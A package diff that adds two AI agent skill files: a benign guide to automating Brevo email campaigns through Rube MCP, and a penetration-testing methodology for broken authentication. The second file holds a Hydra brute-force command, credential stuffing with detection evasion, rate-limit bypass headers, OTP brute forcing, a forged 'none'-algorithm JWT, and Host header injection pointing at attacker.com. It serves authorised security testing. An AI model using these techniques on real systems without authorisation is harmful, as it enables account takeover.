skill-library-mcp 1.0.0

package/skills/brevo-automation/SKILL.md

@@ -0,0 +1,197 @@
+---
+name: brevo-automation
+description: "Automate Brevo (Sendinblue) tasks via Rube MCP (Composio): manage email campaigns, create/edit templates, track senders, and monitor campaign performance. Always search tools first for current schemas."
+requires:
+  mcp: [rube]
+---
+
+# Brevo Automation via Rube MCP
+
+Automate Brevo (formerly Sendinblue) email marketing operations through Composio's Brevo toolkit via Rube MCP.
+
+## Prerequisites
+
+- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
+- Active Brevo connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `brevo`
+- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
+
+## Setup
+
+**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
+
+
+1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
+2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `brevo`
+3. If connection is not ACTIVE, follow the returned auth link to complete Brevo authentication
+4. Confirm connection status shows ACTIVE before running any workflows
+
+## Core Workflows
+
+### 1. Manage Email Campaigns
+
+**When to use**: User wants to list, review, or update email campaigns
+
+**Tool sequence**:
+1. `BREVO_LIST_EMAIL_CAMPAIGNS` - List all campaigns with filters [Required]
+2. `BREVO_UPDATE_EMAIL_CAMPAIGN` - Update campaign content or settings [Optional]
+
+**Key parameters for listing**:
+- `type`: Campaign type ('classic' or 'trigger')
+- `status`: Campaign status ('suspended', 'archive', 'sent', 'queued', 'draft', 'inProcess', 'inReview')
+- `startDate`/`endDate`: Date range filter (YYYY-MM-DDTHH:mm:ss.SSSZ format)
+- `statistics`: Stats type to include ('globalStats', 'linksStats', 'statsByDomain')
+- `limit`: Results per page (max 100, default 50)
+- `offset`: Pagination offset
+- `sort`: Sort order ('asc' or 'desc')
+- `excludeHtmlContent`: Set `true` to reduce response size
+
+**Key parameters for update**:
+- `campaign_id`: Numeric campaign ID (required)
+- `name`: Campaign name
+- `subject`: Email subject line
+- `htmlContent`: HTML email body (mutually exclusive with `htmlUrl`)
+- `htmlUrl`: URL to HTML content
+- `sender`: Sender object with `name`, `email`, or `id`
+- `recipients`: Object with `listIds` and `exclusionListIds`
+- `scheduledAt`: Scheduled send time (YYYY-MM-DDTHH:mm:ss.SSSZ)
+
+**Pitfalls**:
+- `startDate` and `endDate` are mutually required; provide both or neither
+- Date filters only work when `status` is not passed or set to 'sent'
+- `htmlContent` and `htmlUrl` are mutually exclusive
+- Campaign `sender` email must be a verified sender in Brevo
+- A/B testing fields (`subjectA`, `subjectB`, `splitRule`, `winnerCriteria`) require `abTesting: true`
+- `scheduledAt` uses full ISO 8601 format with timezone
+
+### 2. Create and Manage Email Templates
+
+**When to use**: User wants to create, edit, list, or delete email templates
+
+**Tool sequence**:
+1. `BREVO_GET_ALL_EMAIL_TEMPLATES` - List all templates [Required]
+2. `BREVO_CREATE_OR_UPDATE_EMAIL_TEMPLATE` - Create a new template or update existing [Required]
+3. `BREVO_DELETE_EMAIL_TEMPLATE` - Delete an inactive template [Optional]
+
+**Key parameters for listing**:
+- `templateStatus`: Filter active (`true`) or inactive (`false`) templates
+- `limit`: Results per page (max 1000, default 50)
+- `offset`: Pagination offset
+- `sort`: Sort order ('asc' or 'desc')
+
+**Key parameters for create/update**:
+- `templateId`: Include to update; omit to create new
+- `templateName`: Template display name (required for creation)
+- `subject`: Email subject line (required for creation)
+- `htmlContent`: HTML template body (min 10 characters; use this or `htmlUrl`)
+- `sender`: Sender object with `name` and `email`, or `id` (required for creation)
+- `replyTo`: Reply-to email address
+- `isActive`: Activate or deactivate the template
+- `tag`: Category tag for the template
+
+**Pitfalls**:
+- When `templateId` is provided, the tool updates; when omitted, it creates
+- For creation, `templateName`, `subject`, and `sender` are required
+- `htmlContent` must be at least 10 characters
+- Template personalization uses `{{contact.ATTRIBUTE}}` syntax
+- Only inactive templates can be deleted
+- `htmlContent` and `htmlUrl` are mutually exclusive
+
+### 3. Manage Senders
+
+**When to use**: User wants to view authorized sender identities
+
+**Tool sequence**:
+1. `BREVO_GET_ALL_SENDERS` - List all verified senders [Required]
+
+**Key parameters**: (none required)
+
+**Pitfalls**:
+- Senders must be verified before they can be used in campaigns or templates
+- Sender verification is done through the Brevo web interface, not via API
+- Sender IDs can be used in `sender.id` fields for campaigns and templates
+
+### 4. Configure A/B Testing Campaigns
+
+**When to use**: User wants to set up or modify A/B test settings on a campaign
+
+**Tool sequence**:
+1. `BREVO_LIST_EMAIL_CAMPAIGNS` - Find the target campaign [Prerequisite]
+2. `BREVO_UPDATE_EMAIL_CAMPAIGN` - Configure A/B test settings [Required]
+
+**Key parameters**:
+- `campaign_id`: Campaign to configure
+- `abTesting`: Set to `true` to enable A/B testing
+- `subjectA`: Subject line for variant A
+- `subjectB`: Subject line for variant B
+- `splitRule`: Percentage split for the test (1-99)
+- `winnerCriteria`: 'open' or 'click' for determining the winner
+- `winnerDelay`: Hours to wait before selecting winner (1-168)
+
+**Pitfalls**:
+- A/B testing must be enabled (`abTesting: true`) before setting variant fields
+- `splitRule` is the percentage of contacts that receive variant A
+- `winnerDelay` defines how long to test before sending the winner to remaining contacts
+- Only works with 'classic' campaign type
+
+## Common Patterns
+
+### Campaign Lifecycle
+
+```
+1. Create campaign (status: draft)
+2. Set recipients (listIds)
+3. Configure content (htmlContent or htmlUrl)
+4. Optionally schedule (scheduledAt)
+5. Send or schedule via Brevo UI (API update can set scheduledAt)
+```
+
+### Pagination
+
+- Use `limit` (page size) and `offset` (starting index)
+- Default limit is 50; max varies by endpoint (100 for campaigns, 1000 for templates)
+- Increment `offset` by `limit` each page
+- Check `count` in response to determine total available
+
+### Template Personalization
+
+```
+- First name: {{contact.FIRSTNAME}}
+- Last name: {{contact.LASTNAME}}
+- Custom attribute: {{contact.CUSTOM_ATTRIBUTE}}
+- Mirror link: {{mirror}}
+- Unsubscribe link: {{unsubscribe}}
+```
+
+## Known Pitfalls
+
+**Date Formats**:
+- All dates use ISO 8601 with milliseconds: YYYY-MM-DDTHH:mm:ss.SSSZ
+- Pass timezone in the date-time format for accurate results
+- `startDate` and `endDate` must be used together
+
+**Sender Verification**:
+- All sender emails must be verified in Brevo before use
+- Unverified senders cause campaign creation/update failures
+- Use GET_ALL_SENDERS to check available verified senders
+
+**Rate Limits**:
+- Brevo API has rate limits per account plan
+- Implement backoff on 429 responses
+- Template operations have lower limits than read operations
+
+**Response Parsing**:
+- Response data may be nested under `data` or `data.data`
+- Parse defensively with fallback patterns
+- Campaign and template IDs are numeric integers
+
+## Quick Reference
+
+| Task | Tool Slug | Key Params |
+|------|-----------|------------|
+| List campaigns | BREVO_LIST_EMAIL_CAMPAIGNS | type, status, limit, offset |
+| Update campaign | BREVO_UPDATE_EMAIL_CAMPAIGN | campaign_id, subject, htmlContent |
+| List templates | BREVO_GET_ALL_EMAIL_TEMPLATES | templateStatus, limit, offset |
+| Create template | BREVO_CREATE_OR_UPDATE_EMAIL_TEMPLATE | templateName, subject, htmlContent, sender |
+| Update template | BREVO_CREATE_OR_UPDATE_EMAIL_TEMPLATE | templateId, htmlContent |
+| Delete template | BREVO_DELETE_EMAIL_TEMPLATE | templateId |
+| List senders | BREVO_GET_ALL_SENDERS | (none) |

package/skills/broken-authentication/SKILL.md

@@ -0,0 +1,476 @@
+---
+name: Broken Authentication Testing
+description: This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+
+# Broken Authentication Testing
+
+## Purpose
+
+Identify and exploit authentication and session management vulnerabilities in web applications. Broken authentication consistently ranks in the OWASP Top 10 and can lead to account takeover, identity theft, and unauthorized access to sensitive systems. This skill covers testing methodologies for password policies, session handling, multi-factor authentication, and credential management.
+
+## Prerequisites
+
+### Required Knowledge
+- HTTP protocol and session mechanisms
+- Authentication types (SFA, 2FA, MFA)
+- Cookie and token handling
+- Common authentication frameworks
+
+### Required Tools
+- Burp Suite Professional or Community
+- Hydra or similar brute-force tools
+- Custom wordlists for credential testing
+- Browser developer tools
+
+### Required Access
+- Target application URL
+- Test account credentials
+- Written authorization for testing
+
+## Outputs and Deliverables
+
+1. **Authentication Assessment Report** - Document all identified vulnerabilities
+2. **Credential Testing Results** - Brute-force and dictionary attack outcomes
+3. **Session Security Analysis** - Token randomness and timeout evaluation
+4. **Remediation Recommendations** - Security hardening guidance
+
+## Core Workflow
+
+### Phase 1: Authentication Mechanism Analysis
+
+Understand the application's authentication architecture:
+
+```
+# Identify authentication type
+- Password-based (forms, basic auth, digest)
+- Token-based (JWT, OAuth, API keys)
+- Certificate-based (mutual TLS)
+- Multi-factor (SMS, TOTP, hardware tokens)
+
+# Map authentication endpoints
+/login, /signin, /authenticate
+/register, /signup
+/forgot-password, /reset-password
+/logout, /signout
+/api/auth/*, /oauth/*
+```
+
+Capture and analyze authentication requests:
+
+```http
+POST /login HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+
+username=test&password=test123
+```
+
+### Phase 2: Password Policy Testing
+
+Evaluate password requirements and enforcement:
+
+```bash
+# Test minimum length (a, ab, abcdefgh)
+# Test complexity (password, password1, Password1!)
+# Test common weak passwords (123456, password, qwerty, admin)
+# Test username as password (admin/admin, test/test)
+```
+
+Document policy gaps: Minimum length <8, no complexity, common passwords allowed, username as password.
+
+### Phase 3: Credential Enumeration
+
+Test for username enumeration vulnerabilities:
+
+```bash
+# Compare responses for valid vs invalid usernames
+# Invalid: "Invalid username" vs Valid: "Invalid password"
+# Check timing differences, response codes, registration messages
+```
+
+# Password reset
+"Email sent if account exists" (secure)
+"No account with that email" (leaks info)
+
+# API responses
+{"error": "user_not_found"}
+{"error": "invalid_password"}
+```
+
+### Phase 4: Brute Force Testing
+
+Test account lockout and rate limiting:
+
+```bash
+# Using Hydra for form-based auth
+hydra -l admin -P /usr/share/wordlists/rockyou.txt \
+  target.com http-post-form \
+  "/login:username=^USER^&password=^PASS^:Invalid credentials"
+
+# Using Burp Intruder
+1. Capture login request
+2. Send to Intruder
+3. Set payload positions on password field
+4. Load wordlist
+5. Start attack
+6. Analyze response lengths/codes
+```
+
+Check for protections:
+
+```bash
+# Account lockout
+- After how many attempts?
+- Duration of lockout?
+- Lockout notification?
+
+# Rate limiting
+- Requests per minute limit?
+- IP-based or account-based?
+- Bypass via headers (X-Forwarded-For)?
+
+# CAPTCHA
+- After failed attempts?
+- Easily bypassable?
+```
+
+### Phase 5: Credential Stuffing
+
+Test with known breached credentials:
+
+```bash
+# Credential stuffing differs from brute force
+# Uses known email:password pairs from breaches
+
+# Using Burp Intruder with Pitchfork attack
+1. Set username and password as positions
+2. Load email list as payload 1
+3. Load password list as payload 2 (matched pairs)
+4. Analyze for successful logins
+
+# Detection evasion
+- Slow request rate
+- Rotate source IPs
+- Randomize user agents
+- Add delays between attempts
+```
+
+### Phase 6: Session Management Testing
+
+Analyze session token security:
+
+```bash
+# Capture session cookie
+Cookie: SESSIONID=abc123def456
+
+# Test token characteristics
+1. Entropy - Is it random enough?
+2. Length - Sufficient length (128+ bits)?
+3. Predictability - Sequential patterns?
+4. Secure flags - HttpOnly, Secure, SameSite?
+```
+
+Session token analysis:
+
+```python
+#!/usr/bin/env python3
+import requests
+import hashlib
+
+# Collect multiple session tokens
+tokens = []
+for i in range(100):
+    response = requests.get("https://target.com/login")
+    token = response.cookies.get("SESSIONID")
+    tokens.append(token)
+
+# Analyze for patterns
+# Check for sequential increments
+# Calculate entropy
+# Look for timestamp components
+```
+
+### Phase 7: Session Fixation Testing
+
+Test if session is regenerated after authentication:
+
+```bash
+# Step 1: Get session before login
+GET /login HTTP/1.1
+Response: Set-Cookie: SESSIONID=abc123
+
+# Step 2: Login with same session
+POST /login HTTP/1.1
+Cookie: SESSIONID=abc123
+username=valid&password=valid
+
+# Step 3: Check if session changed
+# VULNERABLE if SESSIONID remains abc123
+# SECURE if new session assigned after login
+```
+
+Attack scenario:
+
+```bash
+# Attacker workflow:
+1. Attacker visits site, gets session: SESSIONID=attacker_session
+2. Attacker sends link to victim with fixed session:
+   https://target.com/login?SESSIONID=attacker_session
+3. Victim logs in with attacker's session
+4. Attacker now has authenticated session
+```
+
+### Phase 8: Session Timeout Testing
+
+Verify session expiration policies:
+
+```bash
+# Test idle timeout
+1. Login and note session cookie
+2. Wait without activity (15, 30, 60 minutes)
+3. Attempt to use session
+4. Check if session is still valid
+
+# Test absolute timeout
+1. Login and continuously use session
+2. Check if forced logout after set period (8 hours, 24 hours)
+
+# Test logout functionality
+1. Login and note session
+2. Click logout
+3. Attempt to reuse old session cookie
+4. Session should be invalidated server-side
+```
+
+### Phase 9: Multi-Factor Authentication Testing
+
+Assess MFA implementation security:
+
+```bash
+# OTP brute force
+- 4-digit OTP = 10,000 combinations
+- 6-digit OTP = 1,000,000 combinations
+- Test rate limiting on OTP endpoint
+
+# OTP bypass techniques
+- Skip MFA step by direct URL access
+- Modify response to indicate MFA passed
+- Null/empty OTP submission
+- Previous valid OTP reuse
+
+# API Version Downgrade Attack (crAPI example)
+# If /api/v3/check-otp has rate limiting, try older versions:
+POST /api/v2/check-otp
+{"otp": "1234"}
+# Older API versions may lack security controls
+
+# Using Burp for OTP testing
+1. Capture OTP verification request
+2. Send to Intruder
+3. Set OTP field as payload position
+4. Use numbers payload (0000-9999)
+5. Check for successful bypass
+```
+
+Test MFA enrollment:
+
+```bash
+# Forced enrollment
+- Can MFA be skipped during setup?
+- Can backup codes be accessed without verification?
+
+# Recovery process
+- Can MFA be disabled via email alone?
+- Social engineering potential?
+```
+
+### Phase 10: Password Reset Testing
+
+Analyze password reset security:
+
+```bash
+# Token security
+1. Request password reset
+2. Capture reset link
+3. Analyze token:
+   - Length and randomness
+   - Expiration time
+   - Single-use enforcement
+   - Account binding
+
+# Token manipulation
+https://target.com/reset?token=abc123&user=victim
+# Try changing user parameter while using valid token
+
+# Host header injection
+POST /forgot-password HTTP/1.1
+Host: attacker.com
+email=victim@email.com
+# Reset email may contain attacker's domain
+```
+
+## Quick Reference
+
+### Common Vulnerability Types
+
+| Vulnerability | Risk | Test Method |
+|--------------|------|-------------|
+| Weak passwords | High | Policy testing, dictionary attack |
+| No lockout | High | Brute force testing |
+| Username enumeration | Medium | Differential response analysis |
+| Session fixation | High | Pre/post-login session comparison |
+| Weak session tokens | High | Entropy analysis |
+| No session timeout | Medium | Long-duration session testing |
+| Insecure password reset | High | Token analysis, workflow bypass |
+| MFA bypass | Critical | Direct access, response manipulation |
+
+### Credential Testing Payloads
+
+```bash
+# Default credentials
+admin:admin
+admin:password
+admin:123456
+root:root
+test:test
+user:user
+
+# Common passwords
+123456
+password
+12345678
+qwerty
+abc123
+password1
+admin123
+
+# Breached credential databases
+- Have I Been Pwned dataset
+- SecLists passwords
+- Custom targeted lists
+```
+
+### Session Cookie Flags
+
+| Flag | Purpose | Vulnerability if Missing |
+|------|---------|------------------------|
+| HttpOnly | Prevent JS access | XSS can steal session |
+| Secure | HTTPS only | Sent over HTTP |
+| SameSite | CSRF protection | Cross-site requests allowed |
+| Path | URL scope | Broader exposure |
+| Domain | Domain scope | Subdomain access |
+| Expires | Lifetime | Persistent sessions |
+
+### Rate Limiting Bypass Headers
+
+```http
+X-Forwarded-For: 127.0.0.1
+X-Real-IP: 127.0.0.1
+X-Originating-IP: 127.0.0.1
+X-Client-IP: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+True-Client-IP: 127.0.0.1
+```
+
+## Constraints and Limitations
+
+### Legal Requirements
+- Only test with explicit written authorization
+- Avoid testing with real breached credentials
+- Do not access actual user accounts
+- Document all testing activities
+
+### Technical Limitations
+- CAPTCHA may prevent automated testing
+- Rate limiting affects brute force timing
+- MFA significantly increases attack difficulty
+- Some vulnerabilities require victim interaction
+
+### Scope Considerations
+- Test accounts may behave differently than production
+- Some features may be disabled in test environments
+- Third-party authentication may be out of scope
+- Production testing requires extra caution
+
+## Examples
+
+### Example 1: Account Lockout Bypass
+
+**Scenario:** Test if account lockout can be bypassed
+
+```bash
+# Step 1: Identify lockout threshold
+# Try 5 wrong passwords for admin account
+# Result: "Account locked for 30 minutes"
+
+# Step 2: Test bypass via IP rotation
+# Use X-Forwarded-For header
+POST /login HTTP/1.1
+X-Forwarded-For: 192.168.1.1
+username=admin&password=attempt1
+
+# Increment IP for each attempt
+X-Forwarded-For: 192.168.1.2
+# Continue until successful or confirmed blocked
+
+# Step 3: Test bypass via case manipulation
+username=Admin (vs admin)
+username=ADMIN
+# Some systems treat these as different accounts
+```
+
+### Example 2: JWT Token Attack
+
+**Scenario:** Exploit weak JWT implementation
+
+```bash
+# Step 1: Capture JWT token
+Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
+
+# Step 2: Decode and analyze
+# Header: {"alg":"HS256","typ":"JWT"}
+# Payload: {"user":"test","role":"user"}
+
+# Step 3: Try "none" algorithm attack
+# Change header to: {"alg":"none","typ":"JWT"}
+# Remove signature
+eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.
+
+# Step 4: Submit modified token
+Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
+```
+
+### Example 3: Password Reset Token Exploitation
+
+**Scenario:** Test password reset functionality
+
+```bash
+# Step 1: Request reset for test account
+POST /forgot-password
+email=test@example.com
+
+# Step 2: Capture reset link
+https://target.com/reset?token=a1b2c3d4e5f6
+
+# Step 3: Test token properties
+# Reuse: Try using same token twice
+# Expiration: Wait 24+ hours and retry
+# Modification: Change characters in token
+
+# Step 4: Test for user parameter manipulation
+https://target.com/reset?token=a1b2c3d4e5f6&email=admin@example.com
+# Check if admin's password can be reset with test user's token
+```
+
+## Troubleshooting
+
+| Issue | Solutions |
+|-------|-----------|
+| Brute force too slow | Identify rate limit scope; IP rotation; add delays; use targeted wordlists |
+| Session analysis inconclusive | Collect 1000+ tokens; use statistical tools; check for timestamps; compare accounts |
+| MFA cannot be bypassed | Document as secure; test backup/recovery mechanisms; check MFA fatigue; verify enrollment |
+| Account lockout prevents testing | Request multiple test accounts; test threshold first; use slower timing |